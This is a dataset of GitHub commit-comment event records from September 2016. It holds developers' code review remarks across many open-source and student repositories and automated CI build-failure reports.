{"id":"4556037035","type":"CommitCommentEvent","actor":{"login":"amir150"},"repo":{"name":"amir150/amir150"},"payload":{"comment":{"id":19002651,"position":4,"line":224,"path":"bot/seedbot.lua","commit_id":"cae61f51c48e31747d29272bc792aadab3560769","created_at":"2016-09-13T14:41:46Z","updated_at":"2016-09-13T14:41:46Z","body":"199213153"}},"created_at":"2016-09-13T14:41:46Z"}
{"id":"4556037762","type":"CommitCommentEvent","actor":{"login":"jasongilanfarr"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":19002652,"position":13,"line":58,"path":"src/main/scala/mesosphere/marathon/core/health/HealthCheck.scala","commit_id":"526f5494cf711720ce088becd1fd0de40253a793","created_at":"2016-09-13T14:41:53Z","updated_at":"2016-09-13T14:41:53Z","body":"Pattern matching works? Was complaining about fruitless typetests"}},"created_at":"2016-09-13T14:41:53Z"}
{"id":"4556041397","type":"CommitCommentEvent","actor":{"login":"lgauthier"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":19002657,"position":162,"line":230,"path":"Sources/DataManager.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-13T14:42:24Z","updated_at":"2016-09-13T14:42:24Z","body":"The issue is, if you leave off the word \"parent\", then it's not clear that it's a parent. Parent is its role, so it should be left on. The thing that's removed is duplication of the type information. I think generally you'll end up providing more descriptive words when the arguments are even more standard types like a String or an Int."}},"created_at":"2016-09-13T14:42:24Z"}
{"id":"4556046803","type":"CommitCommentEvent","actor":{"login":"jasongilanfarr"},"repo":{"name":"mesosphere/marathon"},"payload":{"comment":{"id":19002669,"position":5,"line":150,"path":"src/main/scala/mesosphere/marathon/core/heartbeat/MesosHeartbeatMonitor.scala","commit_id":"526f5494cf711720ce088becd1fd0de40253a793","created_at":"2016-09-13T14:43:09Z","updated_at":"2016-09-13T14:43:09Z","body":"Hmm, probably could have used a comment explaining so. Don't really get it."}},"created_at":"2016-09-13T14:43:09Z"}
{"id":"4556047509","type":"CommitCommentEvent","actor":{"login":"Smartlogic-AlanFlett"},"repo":{"name":"Smartlogic-AlanFlett/hello-world"},"payload":{"comment":{"id":19002672,"position":null,"line":null,"path":null,"commit_id":"1d6af62f76e899d642b5e2f026899c6eaa5227f1","created_at":"2016-09-13T14:43:16Z","updated_at":"2016-09-13T14:43:16Z","body":"This is my first line in the read me."}},"created_at":"2016-09-13T14:43:16Z"}
{"id":"4556048434","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"SpencerLJack/homework-portfolio"},"payload":{"comment":{"id":19002674,"position":21,"line":21,"path":"Week 8/js/style.js","commit_id":"ee8e6787a1fa16c644d4bf16815063b8fc6bc4c4","created_at":"2016-09-13T14:43:25Z","updated_at":"2016-09-13T14:43:25Z","body":"Because this is in an each loop you get multiple alerts, which is kind of a drag. Better to have each field get the error class and give this alert (which applies to all the fields) just once. "}},"created_at":"2016-09-13T14:43:25Z"}
{"id":"4556049742","type":"CommitCommentEvent","actor":{"login":"Smartlogic-AlanFlett"},"repo":{"name":"Smartlogic-AlanFlett/hello-world"},"payload":{"comment":{"id":19002680,"position":2,"line":2,"path":"README.md","commit_id":"1d6af62f76e899d642b5e2f026899c6eaa5227f1","created_at":"2016-09-13T14:43:34Z","updated_at":"2016-09-13T14:43:34Z","body":"this is my first edit to the read me"}},"created_at":"2016-09-13T14:43:34Z"}
{"id":"4556050732","type":"CommitCommentEvent","actor":{"login":"ryanspletzer"},"repo":{"name":"VirtualEngine/Lability"},"payload":{"comment":{"id":19002685,"position":null,"line":null,"path":null,"commit_id":"d1c84fc78a9ce898563fdab852b8d1365971a6b9","created_at":"2016-09-13T14:43:43Z","updated_at":"2016-09-13T14:43:43Z","body":"Sweet!"}},"created_at":"2016-09-13T14:43:43Z"}
{"id":"4556051798","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19002691,"position":18,"line":40,"path":"src/utils/LinearAlg2D.cpp","commit_id":"4b20528a347f23231e5609aa40c1db1b350183dd","created_at":"2016-09-13T14:43:51Z","updated_at":"2016-09-13T14:43:51Z","body":"You only ever use the square of this variable, so you can save out a call to the expensive `sqrt`."}},"created_at":"2016-09-13T14:43:51Z"}
{"id":"4556052986","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"SpencerLJack/homework-portfolio"},"payload":{"comment":{"id":19002694,"position":29,"line":29,"path":"Week 8/js/style.js","commit_id":"ee8e6787a1fa16c644d4bf16815063b8fc6bc4c4","created_at":"2016-09-13T14:44:01Z","updated_at":"2016-09-13T14:44:01Z","body":"That's a suspicious name for a div"}},"created_at":"2016-09-13T14:44:01Z"}
{"id":"4556053119","type":"CommitCommentEvent","actor":{"login":"JUnderCover"},"repo":{"name":"JUnderCover/.emacs.d"},"payload":{"comment":{"id":19002696,"position":null,"line":null,"path":null,"commit_id":"161156a0f53e888d361478ef1028dc8bd3208db7","created_at":"2016-09-13T14:44:02Z","updated_at":"2016-09-13T14:44:02Z","body":"To select a theme use: M-x color-theme-select\r\n\r\nFind a way to make default theme?"}},"created_at":"2016-09-13T14:44:02Z"}
{"id":"4556054934","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19002703,"position":null,"line":null,"path":null,"commit_id":"106d9a355167455a7db1a11f205ea6d9926ed738","created_at":"2016-09-13T14:44:19Z","updated_at":"2016-09-13T14:44:19Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35267/testReport/) for this commit**"}},"created_at":"2016-09-13T14:44:19Z"}
{"id":"4556055788","type":"CommitCommentEvent","actor":{"login":"vityayatskiv"},"repo":{"name":"vityayatskiv/projekt"},"payload":{"comment":{"id":19002705,"position":4,"line":4,"path":".gitignore","commit_id":"70c74df8f121a6a3d63b3ca8de92df1698f13358","created_at":"2016-09-13T14:44:26Z","updated_at":"2016-09-13T14:44:26Z","body":"home scrin"}},"created_at":"2016-09-13T14:44:26Z"}
{"id":"4556057877","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"SpencerLJack/homework-portfolio"},"payload":{"comment":{"id":19002709,"position":null,"line":null,"path":null,"commit_id":"ee8e6787a1fa16c644d4bf16815063b8fc6bc4c4","created_at":"2016-09-13T14:44:44Z","updated_at":"2016-09-13T14:44:44Z","body":"Nice work. Be mindful of the how you structure your labels and inputs going forward. Good job getting the validation in there. "}},"created_at":"2016-09-13T14:44:44Z"}
{"id":"4556058489","type":"CommitCommentEvent","actor":{"login":"vityayatskiv"},"repo":{"name":"vityayatskiv/projekt"},"payload":{"comment":{"id":19002715,"position":4,"line":4,"path":".gitignore","commit_id":"70c74df8f121a6a3d63b3ca8de92df1698f13358","created_at":"2016-09-13T14:44:50Z","updated_at":"2016-09-13T14:44:50Z","body":"admin sprite"}},"created_at":"2016-09-13T14:44:50Z"}
{"id":"4556058809","type":"CommitCommentEvent","actor":{"login":"IBPX"},"repo":{"name":"goatattack/goatattack"},"payload":{"comment":{"id":19002716,"position":null,"line":null,"path":null,"commit_id":"a370c9f14bd96f9e7f7542e09d4e24526b55daf7","created_at":"2016-09-13T14:44:53Z","updated_at":"2016-09-13T14:44:53Z","body":"Thanks!"}},"created_at":"2016-09-13T14:44:53Z"}
{"id":"4556060162","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19002723,"position":null,"line":null,"path":null,"commit_id":"2966f74424d7d50ca360ef0aea844b18b80f2df9","created_at":"2016-09-13T14:45:07Z","updated_at":"2016-09-13T14:45:07Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 989](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13188&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 5, passed: 209, ignored: 3 Build time: 00:08:17\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET /group_info request fails on non-existent device: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET group_info after POST should return what was posted.: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET group_info after PUT should return what was updated.: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.PUT group_info if not previously created should create it.: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.DELETE group_info should delete group.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-13T14:45:07Z"}
{"id":"4556060603","type":"CommitCommentEvent","actor":{"login":"lgauthier"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":19002725,"position":255,"line":364,"path":"Sources/DataManager.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-13T14:45:12Z","updated_at":"2016-09-13T14:45:12Z","body":"So, this isn't a migration related comment, but you can actually just leave off the `()` here."}},"created_at":"2016-09-13T14:45:12Z"}
{"id":"4556064208","type":"CommitCommentEvent","actor":{"login":"Trolley33"},"repo":{"name":"Trolley33/Monopoly"},"payload":{"comment":{"id":19002734,"position":null,"line":null,"path":null,"commit_id":"992d58d3a0d79c0a33cd0d30e3fed6e66ac9360f","created_at":"2016-09-13T14:45:41Z","updated_at":"2016-09-13T14:45:41Z","body":"Whoopsy! Accidentally committed this with `fitness-tracker` commits due to JetBrains auto noticing I changed the file. Actually just added a bunch of UI elements for the board."}},"created_at":"2016-09-13T14:45:41Z"}
{"id":"4556065076","type":"CommitCommentEvent","actor":{"login":"tmrts"},"repo":{"name":"tmrts/go-patterns"},"payload":{"comment":{"id":19002737,"position":3,"line":3,"path":"fan/fan_in.go","commit_id":"4bd71e70e3530735f470f9328b38c16ddb325ad0","created_at":"2016-09-13T14:45:47Z","updated_at":"2016-09-13T14:45:47Z","body":"what do you mean?"}},"created_at":"2016-09-13T14:45:47Z"}
{"id":"4556069682","type":"CommitCommentEvent","actor":{"login":"lgauthier"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":19002747,"position":277,"line":403,"path":"Sources/DataManager.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-13T14:46:30Z","updated_at":"2016-09-13T14:46:30Z","body":"We can make this private instead of fileprivate. Also, this can be renamed just like the logger protocol method.\r\n\r\n```\r\nprivate static func log(error: NSError, file: StaticString = #file, function: StaticString = #function, line: UInt = #line)\r\n```"}},"created_at":"2016-09-13T14:46:30Z"}
{"id":"4556071688","type":"CommitCommentEvent","actor":{"login":"xdevelnet"},"repo":{"name":"eddyem/eddys_snippets"},"payload":{"comment":{"id":19002755,"position":null,"line":null,"path":null,"commit_id":"0d31099644adf8fd857c48d4ac05ee460673d073","created_at":"2016-09-13T14:46:47Z","updated_at":"2016-09-13T14:46:47Z","body":"Hi! Would you kindly give some short summary or explanation about \"what's funny\" with this version of \"pwd\"?\r\n\r\nThank you."}},"created_at":"2016-09-13T14:46:47Z"}
{"id":"4556073219","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19002763,"position":null,"line":null,"path":null,"commit_id":"101ed485bb45217bbae8b961aaace4389179588c","created_at":"2016-09-13T14:47:00Z","updated_at":"2016-09-13T14:47:00Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-101ed485bb45217bbae8b961aaace4389179588c-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-101ed485bb45217bbae8b961aaace4389179588c-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T14:47:00Z"}
{"id":"4556074842","type":"CommitCommentEvent","actor":{"login":"frodrigo"},"repo":{"name":"Mapotempo/mapotempo-web"},"payload":{"comment":{"id":19002771,"position":13,"line":943,"path":"config/locales/en.yml","commit_id":"6ad976123e92e29b2b92f953d125b6b9e79a3301","created_at":"2016-09-13T14:47:16Z","updated_at":"2016-09-13T14:47:16Z","body":"stops, not visits"}},"created_at":"2016-09-13T14:47:16Z"}
{"id":"4556074933","type":"CommitCommentEvent","actor":{"login":"jloguercio"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19002773,"position":null,"line":null,"path":null,"commit_id":"1f2dc00382b977d4e56d09e910c39e22266ad4d2","created_at":"2016-09-13T14:47:17Z","updated_at":"2016-09-13T14:47:17Z","body":"If you create a new session (by default without hit in advanced parameters), add a course and students, the session will not show in MyCourses (but will show maybe in the next day). I think the problem is in the coachsessiondate (maybe utc dates issue)"}},"created_at":"2016-09-13T14:47:17Z"}
{"id":"4556080069","type":"CommitCommentEvent","actor":{"login":"Razzile"},"repo":{"name":"Razzile/Liberation"},"payload":{"comment":{"id":19002782,"position":null,"line":null,"path":null,"commit_id":"52ea512f14e05ec22e96d4e91a20155919d878ef","created_at":"2016-09-13T14:47:59Z","updated_at":"2016-09-13T14:47:59Z","body":"wew"}},"created_at":"2016-09-13T14:47:59Z"}
{"id":"4556080278","type":"CommitCommentEvent","actor":{"login":"arscan"},"repo":{"name":"fhir-crucible/crucible"},"payload":{"comment":{"id":19002783,"position":null,"line":null,"path":null,"commit_id":"b1503920e6ff1159fffd4843a49a3cb2aee86885","created_at":"2016-09-13T14:48:01Z","updated_at":"2016-09-13T14:48:01Z","body":"I think we need to revert this @okeefm since @andrequina fixed the dependency updates so we are still using the old handlebars.  Is there an easy way in git to create an undo commit that fixes this?  Or should we just fix by hand?"}},"created_at":"2016-09-13T14:48:01Z"}
{"id":"4556080649","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19002784,"position":null,"line":null,"path":null,"commit_id":"101ed485bb45217bbae8b961aaace4389179588c","created_at":"2016-09-13T14:48:05Z","updated_at":"2016-09-13T14:48:05Z","body":"os_2_0_develop_linux (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-101ed485bb45217bbae8b961aaace4389179588c-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-101ed485bb45217bbae8b961aaace4389179588c-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T14:48:05Z"}
{"id":"4556083457","type":"CommitCommentEvent","actor":{"login":"Maigre"},"repo":{"name":"vberthiaume/HPlayer"},"payload":{"comment":{"id":19002793,"position":null,"line":null,"path":null,"commit_id":"7c92cda10413b951794d95208d420c4379698785","created_at":"2016-09-13T14:48:32Z","updated_at":"2016-09-13T14:48:32Z","body":"Hi,\r\n\"sound\" is the sound only player. video already has it's own audio engine,\r\nthat's why we stop sound here..\r\nBut you might need this on purpose ?"}},"created_at":"2016-09-13T14:48:32Z"}
{"id":"4556092912","type":"CommitCommentEvent","actor":{"login":"Maigre"},"repo":{"name":"vberthiaume/HPlayer"},"payload":{"comment":{"id":19002817,"position":null,"line":null,"path":null,"commit_id":"7c92cda10413b951794d95208d420c4379698785","created_at":"2016-09-13T14:49:55Z","updated_at":"2016-09-13T14:49:55Z","body":"Ok looking at your other commits it seems on purpose.\r\nWhy don't you mux the video with the sound to ensure sync ?"}},"created_at":"2016-09-13T14:49:55Z"}
{"id":"4556094131","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19002820,"position":72,"line":94,"path":"src/utils/LinearAlg2D.cpp","commit_id":"4b20528a347f23231e5609aa40c1db1b350183dd","created_at":"2016-09-13T14:50:08Z","updated_at":"2016-09-13T14:50:08Z","body":"Or there is one result:\r\n\r\n    a---r-------x--->b  r\r\n         '-.    :    .-'\r\n            '-. : .-'\r\n                p"}},"created_at":"2016-09-13T14:50:08Z"}
{"id":"4556099286","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19002832,"position":null,"line":null,"path":null,"commit_id":"101ed485bb45217bbae8b961aaace4389179588c","created_at":"2016-09-13T14:50:54Z","updated_at":"2016-09-13T14:50:54Z","body":"os_2_0_develop_linux (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-101ed485bb45217bbae8b961aaace4389179588c-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-101ed485bb45217bbae8b961aaace4389179588c-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T14:50:54Z"}
{"id":"4556103175","type":"CommitCommentEvent","actor":{"login":"atoomic"},"repo":{"name":"perl11/cperl"},"payload":{"comment":{"id":19002840,"position":5,"line":810,"path":"Porting/Maintainers.pl","commit_id":"ca167a247f622492331c90914c865ffeecbb9bc4","created_at":"2016-09-13T14:51:25Z","updated_at":"2016-09-13T14:51:25Z","body":"I already have a ticket opened for this https://rt.cpan.org/Ticket/Display.html?id=117674"}},"created_at":"2016-09-13T14:51:25Z"}
{"id":"4556104202","type":"CommitCommentEvent","actor":{"login":"abangcik"},"repo":{"name":"abangcik/tasks"},"payload":{"comment":{"id":19002841,"position":2,"line":2,"path":"README.md","commit_id":"42cdf9d1f651f1473645845f24ea054f699fb775","created_at":"2016-09-13T14:51:34Z","updated_at":"2016-09-13T14:51:34Z","body":"apa ini"}},"created_at":"2016-09-13T14:51:34Z"}
{"id":"4556109643","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"smason76/Homework-8"},"payload":{"comment":{"id":19002856,"position":116,"line":116,"path":"Assignment/starter_code/register.html","commit_id":"83ca5e8dfefa77483467925d4d2623301afa1e1f","created_at":"2016-09-13T14:52:25Z","updated_at":"2016-09-13T14:52:25Z","body":"Excellent job with this piece. Because the names are the same, you've ensured that they're mutually exclusive selections. "}},"created_at":"2016-09-13T14:52:25Z"}
{"id":"4556110601","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19002862,"position":null,"line":null,"path":null,"commit_id":"5d75609ed75b7a349b0ca5ba5faf6cd8940af775","created_at":"2016-09-13T14:52:32Z","updated_at":"2016-09-13T14:52:32Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#aHWcUOaeRL6V8IQqJaYpcw"}},"created_at":"2016-09-13T14:52:32Z"}
{"id":"4556112915","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19002866,"position":null,"line":null,"path":null,"commit_id":"720cbbfb1b246ea4499067a7096b1e3ed0b4ba1f","created_at":"2016-09-13T14:52:53Z","updated_at":"2016-09-13T14:52:53Z","body":"Inside the 'Clubs' tab, there are four societies (accordion) inside which, clubs' names and their respective head members' names are listed. This representation doesn't look good as there are lot many clubs inside on society so listing them serially is not a good way. Make tabs inside each society and those tabs will be the names of the clubs. When the tabs are clicked then the details of that clubs should be displayed.\r\n\r\nHave a look at the Placements Live page, there, both things are used, tabs and accordions."}},"created_at":"2016-09-13T14:52:53Z"}
{"id":"4556114278","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19002869,"position":81,"line":106,"path":"youtube_dl/extractor/adobepass.py","commit_id":"7a7309219cae70e14f58e904591a77360bfbc985","created_at":"2016-09-13T14:53:04Z","updated_at":"2016-09-13T14:53:04Z","body":"There should be an error thrown indicating unsupported catv provider or at least a warning if we assume it may work with no login data. Or this should be thrown even earlier when `ap_mso_id` is obtained."}},"created_at":"2016-09-13T14:53:04Z"}
{"id":"4556120204","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19002878,"position":6,"line":290,"path":"tests/utils/LinearAlg2DTest.cpp","commit_id":"4b20528a347f23231e5609aa40c1db1b350183dd","created_at":"2016-09-13T14:53:58Z","updated_at":"2016-09-13T14:53:58Z","body":"Code style: Space after comma. Fixed these for you in 0743994375d352558a9771daaa0ad63c65a366dc."}},"created_at":"2016-09-13T14:53:58Z"}
{"id":"4556122969","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"smason76/Homework-8"},"payload":{"comment":{"id":19002893,"position":null,"line":null,"path":null,"commit_id":"83ca5e8dfefa77483467925d4d2623301afa1e1f","created_at":"2016-09-13T14:54:24Z","updated_at":"2016-09-13T14:54:24Z","body":"I'm impressed that you got the labels for each of the radio buttons and the terms and conditions at the bottom figured out. There are a few gotchas with forms and getting those two things figured out are certainly a couple. Well done!"}},"created_at":"2016-09-13T14:54:24Z"}
{"id":"4556128423","type":"CommitCommentEvent","actor":{"login":"chiester"},"repo":{"name":"facebook/react"},"payload":{"comment":{"id":19002908,"position":31,"line":114,"path":"docs/docs/10.1-animation.md","commit_id":"f17a15a07d856c8f2c805512887b929c03071874","created_at":"2016-09-13T14:55:09Z","updated_at":"2016-09-13T14:55:09Z","body":"Can you provide some definitions of what \"enter\" and \"appear\" mean in this context (or generally in the context of React Animation? "}},"created_at":"2016-09-13T14:55:09Z"}
{"id":"4556130923","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19002914,"position":7,"line":356,"path":"youtube_dl/options.py","commit_id":"7a7309219cae70e14f58e904591a77360bfbc985","created_at":"2016-09-13T14:55:33Z","updated_at":"2016-09-13T14:55:33Z","body":"It's also a right time to add `--ap-username` and `--ap-password`."}},"created_at":"2016-09-13T14:55:33Z"}
{"id":"4556135545","type":"CommitCommentEvent","actor":{"login":"vberthiaume"},"repo":{"name":"vberthiaume/HPlayer"},"payload":{"comment":{"id":19002931,"position":null,"line":null,"path":null,"commit_id":"7c92cda10413b951794d95208d420c4379698785","created_at":"2016-09-13T14:56:15Z","updated_at":"2016-09-13T14:56:15Z","body":"Hey!\r\n\r\nhaha I didn't think anyone but me would look at this code ;). The reason I started messing with the code is that I needed to use a usb audio interface on my RPI, and the audio from ofxomplayer, as far as I know, cannot come out of there, because omxplayer isn't ALSA compatible. However, I found that the soundplayer object CAN play audio out of my audio interface. So what I have here is the sound player running in parallel with the video player. And the sound player ends semi-correctly, so I'm using that to trigger the video end as well. This is all VERY sub-optimal, but I didn't know where else to look--i had no idea ofxomplayer changed a lot."}},"created_at":"2016-09-13T14:56:15Z"}
{"id":"4556135604","type":"CommitCommentEvent","actor":{"login":"6a68"},"repo":{"name":"meandavejustice/min-vid"},"payload":{"comment":{"id":19002932,"position":61,"line":77,"path":"index.js","commit_id":"4f165b7a8f11549c99306cb508c2a8729ef05ee1","created_at":"2016-09-13T14:56:15Z","updated_at":"2016-09-13T14:56:15Z","body":"I think this might introduce a bug wherethe controls look minimized after reopening"}},"created_at":"2016-09-13T14:56:15Z"}
{"id":"4556143682","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19002954,"position":null,"line":null,"path":null,"commit_id":"1f2dc00382b977d4e56d09e910c39e22266ad4d2","created_at":"2016-09-13T14:57:27Z","updated_at":"2016-09-13T14:57:27Z","body":"As a reminder, all times stored in the database have to use the UTC datetime, as described here https://support.chamilo.org/projects/chamilo-18/wiki/Coding_conventions#time-not-NOW\r\nAs such, if the server is properly configured, the time is only checked as a conversion of the local time to UTC vs the UTC in the database."}},"created_at":"2016-09-13T14:57:27Z"}
{"id":"4556149233","type":"CommitCommentEvent","actor":{"login":"vitorbaptista"},"repo":{"name":"georgiana-b/api"},"payload":{"comment":{"id":19002965,"position":7,"line":7,"path":"api/models/risk_of_bias.js","commit_id":"90c8c6f9ff5365fa71f9da8c320a729c5d8c9169","created_at":"2016-09-13T14:58:17Z","updated_at":"2016-09-13T14:58:17Z","body":"As you're not using these models, you can simply do `require('./risk_of_bias_criterion')`, without saving them in variables."}},"created_at":"2016-09-13T14:58:17Z"}
{"id":"4556152354","type":"CommitCommentEvent","actor":{"login":"Majkl578"},"repo":{"name":"EDDiscovery/EDDiscovery"},"payload":{"comment":{"id":19002974,"position":null,"line":null,"path":null,"commit_id":"73bc0e70bb180601fdb2abeb64db27bb468a3ae2","created_at":"2016-09-13T14:58:43Z","updated_at":"2016-09-13T14:58:43Z","body":"Well, I'm, not following dotnet development at all, but it still seems pretty active, both in terms of development and cross-platform builds: https://github.com/dotnet/corefx"}},"created_at":"2016-09-13T14:58:43Z"}
{"id":"4556153119","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19002975,"position":null,"line":null,"path":null,"commit_id":"5f84860065c26e07b98500ee0f60d2d2e5d8d755","created_at":"2016-09-13T14:58:50Z","updated_at":"2016-09-13T14:58:50Z","body":"@gyrog I'll write a swap file gui, similar to the underdog gui by mistfire (/usr/sbin/underdog). shutdownconfig will also be able to create a swap file, following the same pupsave rules...\r\nwell, this commit make rc.sysinit mount PDEV1, then it checks if pupswap.swp is there (if not then unmounts PDEV1)... this happens only if 4 conditions are met... see line 78.. so this effectively happens in pupmode 5\r\n\r\nprobably a kernel param also makes sense..\r\n\r\n@mavrothal i'll improve this and i'll use the output of ```probedisk``` to determine if a device meets the criteria, i see the drive description also gives clues about the drive type:\r\n\r\n\t/dev/sdc|usbdrv|Lexar USB Flash Drive\r\n"}},"created_at":"2016-09-13T14:58:50Z"}
{"id":"4556153381","type":"CommitCommentEvent","actor":{"login":"markstory"},"repo":{"name":"cakephp/cakephp"},"payload":{"comment":{"id":19002977,"position":null,"line":null,"path":null,"commit_id":"5253f0b3bd06f3a1e3cc776e6dd90116a5a108e4","created_at":"2016-09-13T14:58:52Z","updated_at":"2016-09-13T14:58:52Z","body":"@oscar-ol Please open a new issue. Commit comments get lost very easily and are not suitable for reporting issues."}},"created_at":"2016-09-13T14:58:52Z"}
{"id":"4556153975","type":"CommitCommentEvent","actor":{"login":"nmjbhoffmann"},"repo":{"name":"linuxmint/Cinnamon"},"payload":{"comment":{"id":19002982,"position":null,"line":null,"path":null,"commit_id":"e085fe85443387b2ba56cc15b896539b569c9894","created_at":"2016-09-13T14:58:57Z","updated_at":"2016-09-13T14:58:57Z","body":"That is an awesome idea, I use the scroll on hover thing to change the volume all the time, can't wait for the update :D"}},"created_at":"2016-09-13T14:58:57Z"}
{"id":"4556154268","type":"CommitCommentEvent","actor":{"login":"QuietOmen"},"repo":{"name":"deseretdigital-ui/ddm-selecty"},"payload":{"comment":{"id":19002985,"position":13,"line":31,"path":"src/simple/stateless/suggestions/option-groups/group/index.js","commit_id":"66d8524d4dfea4105ef3a0fbb6b41c23b6abf6e1","created_at":"2016-09-13T14:59:00Z","updated_at":"2016-09-13T14:59:00Z","body":"@babak49 why did we remove this? We could have just added a flag to hide this feature if we didn't want it. "}},"created_at":"2016-09-13T14:59:00Z"}
{"id":"4556155712","type":"CommitCommentEvent","actor":{"login":"bauschan"},"repo":{"name":"dkd/typo3_console"},"payload":{"comment":{"id":19002988,"position":null,"line":null,"path":null,"commit_id":"20ce1a0ce99f41b2f7750a2baa80ca2ef6f91edf","created_at":"2016-09-13T14:59:15Z","updated_at":"2016-09-13T14:59:15Z","body":"Looks good to me"}},"created_at":"2016-09-13T14:59:15Z"}
{"id":"4556155819","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"wyatt-nelson/Homework_8"},"payload":{"comment":{"id":19002989,"position":10,"line":10,"path":"js/index.js","commit_id":"f0cdf63f6a9ef013ff4dd59e90308abb0b3ceed2","created_at":"2016-09-13T14:59:16Z","updated_at":"2016-09-13T14:59:16Z","body":"This should be a listener on the form itself"}},"created_at":"2016-09-13T14:59:16Z"}
{"id":"4556157625","type":"CommitCommentEvent","actor":{"login":"vityayatskiv"},"repo":{"name":"vityayatskiv/home"},"payload":{"comment":{"id":19002993,"position":1,"line":1,"path":"README.md","commit_id":"45fafdacc40d7f592be44648746029fb7fa1297c","created_at":"2016-09-13T14:59:32Z","updated_at":"2016-09-13T14:59:32Z","body":"dgffdgfhfh"}},"created_at":"2016-09-13T14:59:32Z"}
{"id":"4556158077","type":"CommitCommentEvent","actor":{"login":"vityayatskiv"},"repo":{"name":"vityayatskiv/home"},"payload":{"comment":{"id":19002994,"position":null,"line":null,"path":null,"commit_id":"45fafdacc40d7f592be44648746029fb7fa1297c","created_at":"2016-09-13T14:59:36Z","updated_at":"2016-09-13T14:59:36Z","body":"bbghghg"}},"created_at":"2016-09-13T14:59:36Z"}
